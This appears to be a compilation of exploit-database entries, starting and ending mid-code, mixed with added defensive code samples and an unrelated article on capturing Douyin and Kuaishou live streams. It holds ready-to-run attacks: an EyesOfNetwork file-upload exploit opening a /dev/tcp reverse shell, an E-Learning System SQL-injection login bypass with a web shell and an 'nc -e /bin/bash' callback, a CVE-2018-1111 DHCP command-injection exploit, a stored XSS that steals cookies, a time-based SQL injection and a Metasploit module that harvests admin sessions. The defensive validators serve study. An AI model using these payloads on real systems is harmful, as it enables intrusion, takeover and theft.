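        {"USERID": "1", "USERNAME": "admin", "UPASS": "admin"}, session)
    # The same POST from the application's own page, carrying the token.
    legit = state_change_allowed(
        "POST", {"Origin": "http://localhost"},
        {"USERID": "1", "USERNAME": "admin", "UPASS": "admin", "csrf_token": token}, session)
    return {"phpfusion_get": fusion[1], "hotel_post": hotel[1], "legit": legit[1]}


if __name__ == "__main__":
    print(replay_page_pocs())
```

The origin check alone would already stop the hotel PoC, but only the token stops a forged request whose Referer was stripped by a referrer policy, which is why the two are layered rather than treated as alternatives.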
-
EyesOfNetwork 5.3 - File Upload Remote Code Execution
# Exploit Title: EyesOfNetwork 5.3 - File Upload Remote Code Execution
# Date: 10/01/2021
# Exploit Author: Ariane.Blow
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3-10 (12/9/2020-latest)

#!/bin/bash
# (/!\) You may have to change this string: "user_id=1; user_limitation=0; group_id=1" if you are not the admin user in the admin group; you find this in the cookie params /!\
###############################################
#  (Authenticated)                            #
#  Arbitrary file upload                      #
#  It was a challenge to do that in BASH      #
#  But the exploit's working fine!            #
#  ...........                                #
#  Exploit is working with the actual version #
#  Scripted on 01/10/2021                     #
#  By Ariane.Blow                             #
#  https://ariane.agency/                     #
###############################################

banner() {
    clear
    echo "            ,*-."
    echo '            |  |'
    echo '        ,.  |  |'
    echo '        | |_|  | ,.'
    echo '        `---.  |_| |'
    echo '            |  .--`'
    echo "            |  |"
    echo "            |  |"
    echo ""
    echo "   ! DO NOT USE IF YOU DONT HAVE PERMISSION !"
    echo ""
    echo "   EyesOfNetwork 5.3-10"
    echo ""
    echo "   RedTeam Tool"
    echo ""
    echo "   Input verification desertion"
    echo ""
    echo "   RCE via Arbitrary FileUpload"
    echo ""
    echo ""
}

VAR() {
    # Because I don't want to see all the *.sh in my OPT directory ... BashMan tips xD !
    mkdir /tmp/EON53
    cd /tmp/EON53
    # You cannot upload more than one file with the same URL and the same filename,
    # so a random suffix is added to the URL and to the filename
    export random=$(cat /dev/urandom | tr -dc 'bcdfghjklmnpqrstvwxz' | head -c 9)
    export filename=shell$random.xml.php
    echo "EyesOfNetwork IP :"
    read eonIP
    echo "HackerIP (used to start the listener) :"
    read hackerIP
    echo "Hacker PORT (used to start the listener):"
    read PORT
    echo "Username (default = admin) :"
    read username
    echo "password :"
    read password
}

# Getting the session_id. The curl command line is written to a helper script
# first so that $'...' quoting is applied when the helper runs.
GetSessionID() {
    echo "getting sessionID ..."
    echo "curl -i -s -k -X $'POST' -H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://$eonIP/login.php' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 20' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' --data-binary $'login=$username&mdp=$password' $'https://$eonIP/login.php' | grep session | cut -d ';' -f 1 | cut -d '=' -f 2" >> GetSession.sh
    chmod +x GetSession.sh
    sessionID=$(./GetSession.sh)
    echo "sessionID acquired : $sessionID"
    sleep 3
    echo
}

# Start listener
start_listen() {
    printf "\e[31;1m When the Reverse-Shell is established, you can PrivEsc with :\e[0m \n"
    echo "echo 'os.execute(\"/bin/sh\")' > /tmp/nmap.script"
    echo "sudo nmap --script=/tmp/nmap.script"
    printf "\e[31;1m ... I Know ... \e[0m \n"
    echo "gnome-terminal -e 'nc -lnvp $PORT'" >> listen.sh
    chmod +x listen.sh
    ./listen.sh
}

# POST payload: multipart upload to the ITSM module with the PHP reverse shell
# as the attached file ($filename ends in .xml.php)
Payload() {
    echo "Sending PostRequest ..."
    echo "curl -i -s -k -X $'POST' \
-H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------123135855827554554412483984802' -H $'Content-Length: 1565' -H $'Origin: https://$eonIP' -H $'Connection: close' -H $'Referer: https://$eonIP/module/admin_itsm/modification_itsm.php' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
-b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
--data-binary $'-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url_id\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_url\"\x0d\x0a\x0d\x0ahttp://HackMe.ImFamous$random\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"fileName\"; filename=\"$filename\"\x0d\x0aContent-Type: text/xml\x0d\x0a\x0a<?php\x0d\x0aexec(\"/bin/bash -c \'bash -i > /dev/tcp/$hackerIP/$PORT 0>&1\'\");\x0a\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"input_file_name\"\x0d\x0a\x0d\x0ashell.xml\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_type_request\"\x0d\x0a\x0d\x0aget\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_header[]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][var_name]\"\x0d\x0a\x0d\x0aaz\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_var[0][champ_ged_id]\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_parent\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"itsm_return_champ\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------123135855827554554412483984802\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0aadd_external_itsm\x0d\x0a-----------------------------123135855827554554412483984802--\x0d\x0a' \
$'https://$eonIP/module/admin_itsm/ajax.php' | grep success" >> req.sh
    chmod +x req.sh
    ./req.sh
}

# GET request on the uploaded PHP file to trigger the reverse shell
Req_payload() {
    echo "Get request on the PHP payload ..."
    echo "curl -i -s -k -X $'GET' \
-H $'Host: $eonIP' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Cookie: session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' \
-b $'session_id=$sessionID; user_name=$username; user_id=1; user_limitation=0; group_id=1' \
$'https://$eonIP/module/admin_itsm/uploaded_file/$filename'" >> reqGET.sh
    chmod +x reqGET.sh
    ./reqGET.sh
}

# Clearing
Clear_cache() {
    echo "clearing cache"
    rm listen.sh
    rm req.sh
    rm reqGET.sh
    rm GetSession.sh
    cd ..
    rmdir EON53
}

# MAIN
banner
VAR
GetSessionID
start_listen
Payload
Req_payload
Clear_cache
-
Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
# Exploit Author: Mesut Cetin
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

The 'person' parameter is vulnerable to time-based SQL Injection.

######## Proof of Concept ########

Payload: (select*from(select(sleep(10)))a)

Using Burp Suite, send the following POST request:

POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc
Upgrade-Insecure-Requests: 1

arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
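The fix a defender wants for the report above is server-side: accept 'person' only as a small integer and bind it as a query parameter, so the sleep() payload never reaches the SQL parser. This is an added example, not code from the Online Hotel Reservation System; the room table and the MAX_PERSONS limit are constructed for the demonstration, and the misspelled field name 'accomodation' is kept because that is what the form sends.

```python
"""Server-side handling for the booking form from the advisory above.
Added example, not part of the original advisory: the room table, the
limits and the helper names are constructed for the demonstration."""
import re
import sqlite3
from datetime import datetime
from urllib.parse import parse_qs

# Tokens and characters that never occur in a legitimate head count. They are
# not the defence (the isdigit() check is); they only label the rejection so a
# log entry is easier to triage.
SQLI_HINT = re.compile(r"(?i)\b(sleep|benchmark|select|union|waitfor)\b|[()'\"]")
MAX_PERSONS = 20          # constructed business limit


def validate_booking(body: str) -> dict:
    """Parse a urlencoded POST body; return {'ok', 'errors', 'values'}."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    errors, values = [], {}

    # Dates must parse strictly as MM/DD/YYYY, the format the form submits.
    for field in ("arrival", "departure"):
        try:
            values[field] = datetime.strptime(form.get(field, ""), "%m/%d/%Y").date()
        except ValueError:
            errors.append("%s: expected MM/DD/YYYY" % field)
    if "arrival" in values and "departure" in values and values["departure"] <= values["arrival"]:
        errors.append("departure must be after arrival")

    # Numeric fields: whitelist digits, then range-check. Anything else is
    # rejected before any SQL is built; the payload from the report fails here.
    for field, lo, hi in (("person", 1, MAX_PERSONS), ("accomodation", 0, 10**6)):
        raw = form.get(field, "")
        if not raw.isdigit():
            kind = "injection-like" if SQLI_HINT.search(raw) else "non-numeric"
            errors.append("%s: %s value rejected" % (field, kind))
        elif not lo <= int(raw) <= hi:
            errors.append("%s: out of range" % field)
        else:
            values[field] = int(raw)

    return {"ok": not errors, "errors": errors, "values": values}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory room table standing in for the application's MySQL schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE room (id INTEGER PRIMARY KEY, capacity INTEGER)")
    conn.executemany("INSERT INTO room VALUES (?, ?)", [(1, 1), (2, 2), (3, 4)])
    return conn


def rooms_for(conn: sqlite3.Connection, person: int) -> list:
    """Parameter binding: the driver sends the value separately from the SQL
    text, so even a string payload would be compared as data, never parsed."""
    cur = conn.execute("SELECT id FROM room WHERE capacity >= ? ORDER BY id", (person,))
    return [row[0] for row in cur.fetchall()]


def handle_booking(conn: sqlite3.Connection, body: str) -> dict:
    """Validate first; only a validated integer reaches the query."""
    result = validate_booking(body)
    if result["ok"]:
        result["rooms"] = rooms_for(conn, result["values"]["person"])
    return result


if __name__ == "__main__":
    # The exact body from the proof of concept above.
    POC = ("arrival=01%2F19%2F2021&departure=01%2F11%2F2021"
           "&person=(select*from(select(sleep(10)))a)&accomodation=0")
    print(handle_booking(make_db(), POC))
```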
-
E-Learning System 1.0 - Authentication Bypass
# Exploit Title: E-Learning System 1.0 - Authentication Bypass & RCE
# Exploit Author: Himanshu Shukla & Saurav Shukla
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/12808/e-learning-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/caiwl.zip
# Version: 1.0
# Tested On: Kali Linux + XAMPP 7.4.4
# Description: E-Learning System 1.0 - Authentication Bypass Via SQL Injection + Remote Code Execution

#Step 1: run the exploit in python with this command: python3 exploit.py
#Step 2: Input the URL of the vulnerable application: Example: http://10.10.10.23/caiwl/
#Step 3: Input your LHOST where you want the reverse shell: Example: 10.9.192.23
#Step 4: Input your LPORT, the port where the reverse shell will spawn: Example: 4444
#Step 5: Start a Netcat listener on the port specified in Step 4 using this command: nc -lnvp 4444
#Step 6: Hit enter once your Netcat listener is ready; you will get a reverse shell as soon as you hit enter.

import requests

print('########################################################')
print('##              E-LEARNING SYSTEM 1.0                 ##')
print('##   AUTHENTICATION BYPASS & REMOTE CODE EXECUTION    ##')
print('########################################################')
print('Author - Himanshu Shukla & Saurav Shukla')

GREEN = '\033[32m'  # Green Text
RED = '\033[31m'    # Red Text
RESET = '\033[m'    # reset to the defaults

#Create a new session
s = requests.Session()

#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK = input("Enter URL of The Vulnerable Application : ")

#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"user_email": "'or 1 or'", "user_pass": "lol", "btnLogin": ""}
r = s.post(LINK + 'admin/login.php', data=values, cookies=cookies)
r = s.post(LINK + 'admin/login.php', data=values, cookies=cookies)

#Check if Authentication was bypassed or not.
logged_in = True if ("You login as Administrator." in r.text) else False
l = logged_in
if l:
    print(GREEN + "[+]Authentication Bypass Successful!", RESET)
else:
    print(RED + "[-]Failed To Authenticate!", RESET)

#Creating a PHP Web Shell
phpshell = {
    'file': (
        'shell.php',
        '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
        'application/x-php',
        {'Content-Disposition': 'form-data'}
    )
}

# Defining value for form data
data = {'LessonChapter': 'test', 'LessonTitle': 'test', 'Category': 'Docs', 'save': ''}

#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK + '/admin/modules/lesson/controller.php?action=add', cookies=cookies, files=phpshell, data=data, verify=False)
shell_upload = True if ("window.location='index.php'" in upload.text) else False
u = shell_upload
if u:
    print(GREEN + "[+]PHP Shell has been uploaded successfully!", RESET)
else:
    print(RED + "[-]Failed To Upload The PHP Shell!", RESET)

print("[*]Please Input Reverse Shell Details")
LHOST = input("[*]LHOST : ")
LPORT = input("[*]LPORT : ")
print('[*]Start Your Netcat Listener With This Command : nc -lvnp ' + LPORT)
input('[*]Hit Enter if your netcat shell is ready. ')
print('[+]Deploying The Web Shell...')

#Executing The Webshell
e = s.get('http://192.168.1.5/caiwl/admin/modules/lesson/files/shell.php?cmd=nc 192.168.1.2 9999 -e /bin/bash', cookies=cookies)
exit()
-
Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS
# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS
# Exploit Author: Siva Rajendran
# Date: 2020-12-31
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Windows 10, Firefox Version 84.0

Step 1. Go to the sign-up page.
Step 2. In the "Last Name" field, enter the following XSS payload as the name and click Save:
"><img src=xx onerror=alert(document.cookie)>
Step 3. This triggers the stored XSS payload in the Users tab of the admin panel once the admin logs in to the application to verify the registered user's email address. The attacker steals the admin session cookie.
-
Title: Crawl Douyin, Kuaishou and Camera Live Streams

In recent years, live broadcasts on all kinds of platforms have become increasingly popular, and in daily life and production there are scenarios where a live stream is needed somewhere else. For example, can the live streams of the Douyin and Kuaishou platforms be captured and played directly, in real time, in a network player? Let's study it with my cousin!

Three common live broadcast protocols

RTMP was designed for streaming media and is the protocol used most often for pushing streams; most CDN vendors support it.

HTTP-FLV uses an HTTP long connection, similar to RTMP streaming, and has to be distributed by a dedicated streaming server. It combines the advantages of both: it is a streaming protocol that can reuse existing HTTP distribution resources, its real-time performance equals RTMP, it saves some protocol handshake time compared with RTMP, has a shorter first-frame time and is easier to extend.

HLS, the live broadcast protocol proposed by Apple, holds an unshakable position on iOS, and Android provides corresponding support as well.

Get the Douyin and Kuaishou live streams

How do we get the address of a Douyin live stream? We only need a traffic analysis tool to grab the URLs that use the protocols above. First, find the live broadcast to crawl and share it. Open the shared address in a browser, then use the traffic analysis tool to capture the current packets and search the captured traffic for the live broadcast file formats flv or m3u8.

Right-click to copy the address, then put it into a streaming media player to test it. In the same way, the live streams of Kuaishou and Bilibili (B站) can be captured: crawl the data, capture the packets, test.

Display with HTML

Now we run into a new problem. We have the live stream, but it can only be played through a streaming player. Can live video be played through HTML? In HTML5 the video tag plays videos, but it only handles common formats such as mp4 and avi; formats such as flv and m3u8 are not supported. How do we solve this?

Getting to know flv.js

flv.js is a JavaScript library that plays FLV videos in an HTML5 video element. It works by remuxing the FLV stream into ISO BMFF (fragmented MP4) fragments and feeding those fragments to the browser through Media Source Extensions. flv.js does only one thing: after obtaining the audio and video data in FLV format, it demuxes the FLV data in native JavaScript and feeds the native HTML5 video tag through the Media Source Extensions API (HTML5 natively supports only mp4/webm playback, not FLV).

Code example

First, include flv.js; the HTML is as follows:

<script src="https://cdn.bootcss.com/flv.js/1.3.3/flv.js"></script>
<video width="300px" height="400px" id="videoElement" controls></video>
<script>
if (flvjs.isSupported()) {
    var videoElement = document.getElementById('videoElement');
    var flvPlayer = flvjs.createPlayer({
        type: 'flv',
        url: 'https://pull-f3.douyincdn.com/third/stream-111864726937404075_hd.flv?abr_pts=-1800'
    });
    flvPlayer.attachMediaElement(videoElement);
    flvPlayer.load();
    flvPlayer.play();
}
</script>

The effect is shown in the screenshot.

Crawl the camera live stream

Cameras at tourist attractions are also often used for live broadcasts. How is that done? Here we take a home TP-Link camera as an example: share the device in the camera app, then capture the live stream, catch the data packets and test.

Summary

In this issue we explained crawling the live video streaming protocols. The principle is very simple: capture packets and filter for the live broadcast protocols flv and m3u8.
-
Title: CVE-2018-1111 - hijacking DHCP leads to code execution on CentOS

0x01 Vulnerability overview

Red Hat recently released a security update fixing a remote code execution vulnerability numbered CVE-2018-1111. An attacker who forges a DHCP server and sends crafted response packets can attack a Red Hat system, obtain root privileges and execute arbitrary commands.

0x02 Affected versions

Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux Server 7
CentOS 6
CentOS 7

0x03 Vulnerability details

DHCP is a LAN protocol used mainly for dynamic IP address assignment on internal networks. The dhclient package shipped by Red Hat includes the script /etc/NetworkManager/dispatcher.d/11-dhclient (Red Hat Enterprise Linux 7) and /etc/NetworkManager/dispatcher.d/10-dhclient (Red Hat Enterprise Linux 6); this script is executed when the NetworkManager component receives a DHCP response from a DHCP server.

A single quote in an option value breaks out of the parameter value and achieves command execution:

--dhcp-option="252,x'nc -e /bin/bash 10.1.1.1 1337#"

0x04 Reproducing the vulnerability

Note the following when reproducing:
1. Both virtual machines must be set to host-only mode.
2. Disable the DHCP service on the host-only network.

Environment
Attacker machine: Kali 2018.2
Victim machine: CentOS 7
Download CentOS 7 from the Tsinghua mirror site:
https://mirrors.tuna.tsinghua.edu.cn/centos/7.4.1708/isos/x86_64/centos-7-x86_64-dvd-1708.iso
VMware 12.0

Set up the network
Here VMware virtual machines are used. Both systems are connected to the VMnet1 network adapter (host-only mode), and the DHCP service of that adapter is turned off.

Next, start configuring the DHCP server on Kali with dnsmasq. dnsmasq is a compact and convenient tool for configuring DNS and DHCP, suited to small networks; it provides DNS and optional DHCP functions so that a DNS or DHCP service can be set up quickly.

Configure Kali
First, configure a static IP on Kali and add a route. The commands are:

ifconfig eth0 192.168.71.5 netmask 255.255.255.0
route add default gw 192.168.71.5

Then create the configuration file /etc/dnsmasq.conf that dnsmasq will use. Its contents are:

vim /etc/dnsmasq.conf

bind-interfaces
interface=eth0
except-interface=lo
dhcp-range=192.168.71.10,192.168.71.30,22h
dhcp-option=3,192.168.131.5
dhcp-option=6,192.168.131.5
log-queries
log-facility=/var/log/dnsmasq.log

Parameter description:
dhcp-range: the range of IP addresses to assign to clients, and the lease time
dhcp-option: option information handed to DHCP clients
log-facility: the log destination

The option values used in the configuration file and their meanings:
3: sets the gateway address option
6: sets the DNS server address option
252: supplies the URL from which a DHCP client fetches its proxy configuration (wpad-proxy-url)

Option 252, the one used in the payload, belongs to the range reserved for private use; a DHCP server uses code 252 to tell browsers that they can obtain the proxy settings for the network from the URL listed in this option.

Here dhcp-range in dnsmasq.conf is set to the IP range 192.168.71.10-192.168.71.30/24 with a lease time of 12 hours. dhcp-option 3 (gateway address) and dhcp-option 6 (DNS server) are set to the IP address of the Kali local network adapter, and Kali's IP address is static.

After modifying /etc/dnsmasq.conf, the dnsmasq service is not simply started. Instead dnsmasq is used to forge the DNS/DHCP server and deliver the command payload, as follows:

dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'nc -e /bin/bash 192.168.71.5 6666 #"

Here -d runs dnsmasq in the foreground in debug mode and -C specifies the configuration file to use. Use man dnsmasq for a more detailed description of the dnsmasq command.

The effect of the command is to bounce a shell via nc to port 6666 on 192.168.71.5, so an nc listener must be started on Kali. The command is:

nc -l -p 6666 -v

Attack

CentOS is set to obtain an IP address via DHCP and its network adapter is restarted. At this point CentOS restarts the network service and has to obtain the IP address issued by the DHCP server; here the address 192.168.71.18 was obtained. The command is:

/etc/init.d/network restart

The IP has been obtained. Now look at what happened on Kali: in nc on Kali, a CentOS shell is obtained, with root privileges.

0x05 Vulnerability principle

The single quote breaks out of the script's quoting and the script runs directly with root privileges:

dhcp-option="252,x'nc -e /bin/bash 10.1.1.1 1337#"

0x06 Fix

# yum update dhclient
# rpm -qa --changelog dhclient | grep CVE-2018-
- Resolves: #1570898 - CVE-2018-1111: Do not parse backslash as escape character

0x07 Using the exp

#!/usr/bin/python
#encoding=utf-8
from pwn import *
import os
import sys
import time
#author: xyzz@chamd5.org
#time: 20180520

ip = '192.168.131.52'
port = 1314
#context.log_level='debug'

def pwn(ip, port):
    # write the dnsmasq configuration for the forged DHCP server
    f = open('dnsmasq.conf', 'w')
    start = ip[:ip.rfind('.')] + '.10'
    end = ip[:ip.rfind('.')] + '.30'
    dnsmasq = '''
bind-interfaces
interface=eth0
except-interface=lo
dhcp-range={start},{end},22h
dhcp-option=3,{ip}
dhcp-option=6,{ip}
log-queries
log-facility=/var/log/dnsmasq.log
'''.format(ip=ip, start=start, end=end)
    f.write(dnsmasq)
    f.close()

    cm = []
    cm.append('ifconfig eth0 {ip} netmask 255.255.255.0'.format(ip=ip))
    cm.append('route add default gw {ip}'.format(ip=ip))
    cm.append('''dnsmasq -dC dnsmasq.conf --dhcp-option="252,x'nc -e /bin/bash {ip} {port} #"'''.format(ip=ip, port=port))

    q = process('bash')
    for i in range(len(cm) - 1):
        q.sendline(cm[i])
        time.sleep(1)
    #time.sleep(100)

    # listener for the bounced shell
    p = process('bash')
    p.sendline('nc -l -p {port} -v'.format(port=port))
    q.sendline(cm[-1])
    time.sleep(3)
    p.interactive()
    #q.interactive()

if __name__ == '__main__':
    pwn(ip, port)
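A defender-side check, added here and not part of the write-up: it parses the option area of a DHCP reply and flags an option 252 value carrying shell metacharacters, which is exactly what the dhclient dispatcher script would have evaluated. The packets are constructed inline; the helper names are this example's own.

```python
"""Inspect DHCP replies for an option 252 (WPAD URL) value that could abuse
CVE-2018-1111. Added example, not from the original write-up; the packets
built by build_offer() are constructed for the test."""
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # RFC 2132 magic cookie, offset 236 of the BOOTP frame
OPT_MSG_TYPE = 53
OPT_WPAD = 252
OPT_END = 255
# A legitimate WPAD URL never needs any of these; their presence means the value
# was built to break out of a quoted shell assignment in the dhclient script.
SHELL_META = re.compile(r"[\s'\"`;&|$(){}<>\\]")


def parse_dhcp_options(payload: bytes) -> dict:
    """Return {code: value bytes} for a raw DHCP payload (BOOTP header + options).
    Repeated option codes are concatenated as RFC 3396 specifies."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 0:                  # pad octet, no length
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d" % code)
        opts[code] = opts.get(code, b"") + value
        i += 2 + length
    return opts


def inspect_wpad(payload: bytes) -> dict:
    """Classify the option 252 value of one DHCP reply."""
    opts = parse_dhcp_options(payload)
    result = {
        "msg_type": opts.get(OPT_MSG_TYPE, b"\x00")[0],
        "wpad": None,
        "suspicious": False,
        "reason": "",
    }
    wpad = opts.get(OPT_WPAD)
    if wpad is None:
        return result
    text = wpad.decode("utf-8", "replace")
    result["wpad"] = text
    hit = SHELL_META.search(text)
    if hit:
        result["suspicious"] = True
        result["reason"] = "shell metacharacter %r at offset %d" % (hit.group(), hit.start())
    elif not text.lower().startswith(("http://", "https://")):
        result["suspicious"] = True
        result["reason"] = "WPAD value is not an http(s) URL"
    return result


def build_offer(wpad: bytes) -> bytes:
    """Constructed minimal DHCPOFFER: zeroed BOOTP header, magic cookie,
    message-type option, option 252 with the given value, end option."""
    header = bytearray(236)
    header[0] = 2                     # op = BOOTREPLY
    options = (bytes([OPT_MSG_TYPE, 1, 2])          # DHCPOFFER
               + bytes([OPT_WPAD, len(wpad)]) + wpad
               + bytes([OPT_END]))
    return bytes(header) + DHCP_MAGIC + options


if __name__ == "__main__":
    # The payload string from the write-up above, and a benign WPAD URL.
    for value in (b"x'nc -e /bin/bash 10.1.1.1 1337#", b"http://wpad.example.test/wpad.dat"):
        print(inspect_wpad(build_offer(value)))
```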
-
Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User',
      'Description'    => %q{
        This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
        HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
        can be performed without the need for any session(cookie) information. Therefore, the session
        cookie informations of the active users in the application can be read from the response content.
        A new authorized user can be created with the obtained cookie.
      },
      'References'     =>
        [
          [ 'CVE', '' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
          [ 'URL', 'https://www.netsia.com' ]
        ],
      'Author'         =>
        [
          'Özkan Mustafa AKKUŞ' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "2021-01-06",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'The username for your new account']),
        OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
      ])
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def check
    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
      )
    rescue
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.body.include? 'sessionId'
      return Exploit::CheckCode::Vulnerable
    else
      if res.code == 200 and res.body.include? 'SUCCESS'
        print_status("Target is vulnerable! But active admin session was not found. Try again later.")
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  def count_user(data, find_string)
    data.scan(/(?=#{find_string})/).count
  end

  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
    )

    sescount = count_user(res.body, '"name"')
    print_good("Currently #{sescount} active sessions have been detected.")
    cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
    puts cookies

    $i = 0
    while $i <= sescount do
      sessloop = cookies[$i]
      sessid = "SESSION=" + sessloop.to_s
      cookie = sessid.split('"]').join('').split('["').join('')
      $i += 1

